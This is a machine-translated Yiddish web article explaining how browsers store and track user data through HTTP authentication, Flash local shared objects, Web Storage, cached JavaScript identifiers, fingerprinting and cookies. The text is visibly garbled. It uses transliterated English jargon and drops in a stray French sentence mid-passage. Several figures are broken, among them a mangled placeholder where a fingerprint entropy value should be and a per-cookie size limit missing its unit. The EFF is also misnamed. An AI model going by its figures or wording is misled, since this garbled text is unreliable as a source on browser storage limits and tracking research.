דער הטטפּ פּראָטאָקאָל כולל די יקערדיק אַקסעס אָטענטאַקיישאַן פּראָטאָקאָלס און די אַקסעס אָטענטאַקיישאַן דיידזשעסט, וואָס אַלאַוז אַקסעס צו אַ וועב בלאַט בלויז ווען דער באַניצער האט געגעבן די נאמען און פּאַראָל. אויב דער סערווער בעטן אַ באַווייַזן צו געבן אַקסעס צו אַ וועב בלאַט, דער בלעטערער ריקוועס עס פון די באַניצער און אַמאָל באקומען, דער בלעטערער סטאָרז עס און סענדז עס אין אַלע סאַבסאַקוואַנט הטטפּ ריקוועס. די אינפֿאָרמאַציע קענען ווערן גענוצט צו שפּור די באַניצער.

לאקאלע שערד כייפעץ

אויב אַ בלעטערער כולל די Adobe Flash Player פּלוגין, די היגע שערד אַבדזשעקץ קענען זיין געוויינט פֿאַר די זעלבע ציל ווי קיכלעך. זיי קענען זיין אַ אַטראַקטיוו ברירה פֿאַר וועב דעוועלאָפּערס ווייַל:

  • די פעליקייַט גרייס לימיט פֿאַר אַ היגע שערד כייפעץ איז 100 קב;
  • זיכערהייט טשעקס זענען באַזונדער פון באַניצער קיכל טשעקס (אַזוי די היגע שערד אַבדזשעקץ קענען זיין ערלויבט ווען קיכלעך זענען נישט).

די לעצטע פונט, וואָס דיסטינגגווישיז די קיכל פאַרוואַלטונג פּאָליטיק פון די פון Adobe ס היגע שערד אַבדזשעקץ רייזאַז פראגעס וועגן די פאַרוואַלטונג פון די באַניצער פון זיין פּריוואַטקייט סעטטינגס: ער מוזן זיין אַווער אַז זיין פאַרוואַלטונג פון קיכלעך האט קיין פּראַל אויף די פאַרוואַלטונג פון היגע שערד אַבדזשעקץ, און וויצע ווערסאַ.

אן אנדער קריטיק פון דעם סיסטעם איז אַז עס קענען זיין געוויינט בלויז דורך די Adobe Flash Player פּלוגין וואָס איז פּראַפּרייאַטערי און נישט אַ וועב נאָרמאַל.

פּערסיסטאַנס פון קליענט זייַט

עטלעכע וועב בראַוזערז שטיצן אַ שריפט-באזירט פּערסיסטאַנס מעקאַניזאַם, וואָס אַלאַוז די בלאַט צו קראָם אינפֿאָרמאַציע לאָוקאַלי פֿאַר שפּעטער נוצן. Internet Explorer, פֿאַר בייַשפּיל, שטיצט פּערסיסטענט אינפֿאָרמאַציע אין בלעטערער געשיכטע, בוקמאַרקס, אין אַ פֿאָרמאַט סטאָרד אין קסמל, אָדער גלייַך מיט אַ וועב בלאַט געראטעוועט צו דיסק. פֿאַר Microsoft Internet Explorer 5, עס איז אַ באַניצער-דאַטן אופֿן בנימצא דורך DHTML ביכייוויערז.

די W3C ינטראָודוסט אין HTML 5 אַ נייַ דזשאַוואַסקריפּט אַפּי פֿאַר קליענט-זייַט דאַטן סטאָרידזש גערופֿן וועב סטאָרידזש און אַימעד צו פּערמאַנאַנטלי פאַרבייַטן קיכלעך. עס איז ענלעך צו קיכלעך אָבער מיט זייער ימפּרוווד קאַפּאַציטעט און אָן סטאָרינג אינפֿאָרמאַציע אין די כעדער פון הטטפּ ריקוועס. די אַפּי אַלאַוז צוויי טייפּס פון וועב סטאָרידזש: לאָקאַל סטאָרידזש און סעסיע סטאָרידזש, ענלעך צו פּערסיסטענט קיכלעך און סעסיע קיכלעך (אַחוץ אַז סעסיע קיכלעך ויסגיין ווען דער בלעטערער איז פארמאכט בשעת סעסיע סטאָרידזש ויסגיין ווען די קוויטל איז פארמאכט), ריספּעקטיוולי. וועב סטאָרידזש איז געשטיצט דורך Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 און Opera 10.50.

א אַנדערש מעקאַניזאַם נאָרמאַלי רילייז אויף בלעטערער קאַטשינג (אין זכּרון אלא ווי דערפרישן) ניצן דזשאַוואַסקריפּט מגילה אין וועב זייַטלעך. 

פֿאַר בייַשפּיל, אַ בלאַט קענען אַנטהאַלטן דעם קוויטל . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

אין דעם פונט, די פּראָגראַם בלייבט אין קאַש זכּרון און די באזוכט בלאַט איז נישט רילאָודיד אַ צווייט מאָל. דעריבער, אויב די פּראָגראַם כּולל אַ גלאבאלע בייַטעוודיק (פֿאַר בייַשפּיל var id = 3243242;), דעם אידענטיטעט בלייבט גילטיק און קענען זיין עקספּלויטאַד דורך אנדערע דזשאַוואַסקריפּט קאָד אַמאָל די בלאַט איז לאָודיד ווידער, אָדער אַמאָל אַ בלאַט פֿאַרבינדונג די פּראָגראַם איז לאָודיד. 

דער הויפּט כיסאָרן פון דעם אופֿן איז אַז די דזשאַוואַסקריפּט גלאבאלע וועריאַבאַלז מוזן זיין סטאַטיק, טייַטש עס קען נישט זיין טשיינדזשד אָדער אויסגעמעקט ווי אַ קיכל.

וועב בלעטערער פינגערפּרינט

א בלעטערער פינגערפּרינט איז אינפֿאָרמאַציע געזאמלט וועגן די קאַנפיגיעריישאַן סעטטינגס פון אַ בלעטערער פֿאַר לעגיטימאַציע צוועקן. די פינגגערפּרינץ קענען ווערן גענוצט צו גאָר אָדער טייל ידענטיפיצירן אַן אינטערנעט באַניצער אָדער אַ מיטל אפילו ווען קיכלעך זענען פאַרקריפּלט.

יקערדיק וועב בלעטערער קאַנפיגיעריישאַן אינפֿאָרמאַציע איז לאַנג געזאמלט דורך וועבזייטל וילעם באַדינונגס פֿאַר די ציל פון אַקיעראַטלי מעסטן מענטש וועב פאַרקער און דיטעקטינג פאַרשידן פארמען פון קליקס שווינדל. מיט די הילף פון קליענט-זייַט סקריפּטינג שפּראַכן, פיל מער פּינטלעך אינפֿאָרמאַציע זאַמלונג איז איצט מעגלעך.

קאַנווערטינג דעם אינפֿאָרמאַציע אין אַ ביסל שטריקל טראגט אַ מיטל פינגערפּרינט. אין 2010, די עלעקטראָניש פראָנטיער וויקיפּעדיע (EFF) געמאסטן די ענטראָפּיע פון ​​אַ בלעטערער 'ס פינגערפּרינט צו זיין לפּחות קסנומקס ביטן, און דאָס איז געווען איידער אַדוואַנסיז אין לייַוונט פינגערפּרינטינג צוגעגעבן 5,7 ביץ צו אַז ענטראָפּי.

קיכלעך אין אַ נאַטשעל

קיכלעך זענען קליין טעקסט טעקעס סטאָרד דורך די וועב בלעטערער אויף די שווער פאָר פון אַ וועבזייטל גאַסט און וואָס זענען געניצט (צווישן אנדערע זאכן) צו רעקאָרדירן אינפֿאָרמאַציע וועגן דעם גאַסט אָדער זייער נסיעה דורך דעם פּלאַץ. דער וועבמאַסטער קענען דערקענען די געוווינהייטן פון אַ גאַסט און פּערסאַנאַלייז די פּרעזענטירונג פון זיין פּלאַץ פֿאַר יעדער גאַסט; קיכלעך דעריבער מאַכן עס מעגלעך צו געדענקען ווי פילע אַרטיקלען צו ווייַזן אויף די היים בלאַט אָדער אפילו צו האַלטן די לאָגין קראַדענטשאַלז פֿאַר קיין פּריוואַט פּאַרטיי: ווען דער גאַסט קערט צו די פּלאַץ, עס איז ניט מער נויטיק פֿאַר אים צו אַרייַן זיין נאָמען און פּאַראָל. זיין דערקענט, ווייַל זיי זענען אויטאָמאַטיש לייענען אין די קיכל.

א קיכל האט אַ לימיטעד לעבן, באַשטימט דורך די פּלאַץ דיזיינער. זיי קענען אויך ויסגיין אין די סוף פון די סעסיע אויף דעם פּלאַץ, וואָס קאָראַספּאַנדז צו די קלאָוזינג פון דעם בלעטערער. קיכלעך זענען וויידלי געניצט צו מאַכן לעבן גרינגער פֿאַר וויזאַטערז און פאָרשטעלן זיי מיט מער באַטייַטיק אינפֿאָרמאַציע. אָבער ספּעציעל טעקניקס מאַכן עס מעגלעך צו נאָכפאָלגן אַ גאַסט אויף עטלעכע זייטלעך און אַזוי צו זאַמלען און דורכקוקן זייער ברייט אינפֿאָרמאַציע וועגן זיין געוווינהייטן. דער אופֿן האט געגעבן די נוצן פון קיכלעך אַ שעם ווי אַ סערוויילאַנס טעכניק וואָס ווייאַלייץ די פּריוואַטקייט פון וויזאַטערז, וואָס ליידער קאָראַספּאַנדז צו די פאַקט אין פילע קאַסעס פון נוצן פֿאַר ניט-טעכניש סיבות אָדער ניט רעספּעקט פֿאַר באַניצער עקספּעקטיישאַנז.

אין ענטפער צו די לאַדזשיטאַמאַט פירז, HTML 5 ינטראַדוסיז אַ נייַ דזשאַוואַסקריפּט אַפּי פֿאַר קליענט-זייַט דאַטן סטאָרידזש גערופֿן וועב סטאָרידזש, וואָס איז פיל מער זיכער און מיט אַ גרעסערע קאַפּאַציטעט, וואָס יימז צו פאַרבייַטן קיכלעך.

סטאָרידזש פון קיכלעך

מיט עטלעכע בראַוזערז, אַ קיכל איז לייכט עדיטאַבלע, אַ פּשוט טעקסט רעדאַקטאָר ווי נאָטעפּאַד איז גענוג צו טוישן די וואַלועס מאַניואַלי.

קיכלעך זענען געראטעוועט דיפערענטלי דיפּענדינג אויף דעם בלעטערער:

  • מייקראָסאָפֿט Internet Explorer סאַוועס יעדער קיכל אין אַ אַנדערש טעקע;
  • מאָזיללאַ פירעפאָקס סאַוועס אַלע זייַן קיכלעך אין אַ איין טעקע;
  • אָפּערע סאַוועס אַלע זייַן קיכלעך אין אַ איין טעקע און ענקריפּץ זיי (אוממעגלעך צו מאָדיפיצירן זיי אַחוץ אין די ווייכווארג אָפּציעס);
  • עפּל Safari סאַוועס אַלע זייַן קיכלעך אין אַ איין. פּליסט פאַרלענגערונג טעקע. מאָדיפיקאַטיאָן איז מעגלעך אָבער נישט זייער גרינג, סייַדן איר גיין דורך די ווייכווארג אָפּציעס.

בראַוזערז זענען פארלאנגט צו שטיצן אַ מינימאַ :

  • 300 סיימאַלטייניאַס קיכלעך;
  • 4 פּער קיכל;
  • 20 קיכלעך פּער באַלעבאָס אָדער פעלד.
[גאַנץ: 0 מיין: 0]

געשריבן דורך איבערבליקן רעדאקציע

די מאַנשאַפֿט פון עקספּערט רעדאקציע ספּענדז זייער צייט אין פאָרשונג פון פּראָדוקטן, דורכפירן פיר טעסץ, ינטערוויוז פון פּראָפעססיאָנאַלס אין אינדוסטריע, ריוויוינג קאַנסומער באריכטן און שרייבן אַלע אונדזער רעזולטאַטן ווי אַ פאַרשטיייק און פולשטענדיק סאַמעריז.

לאָזן אַ באַמערקונג

אייער בליצפּאָסט אַדרעס וועט נישט זיין ארויס. פארלאנגט פעלדער זענען אנגעצייכנט *

וואָס טאָן איר טראַכטן?

384 ווייזט
Upvote Downvote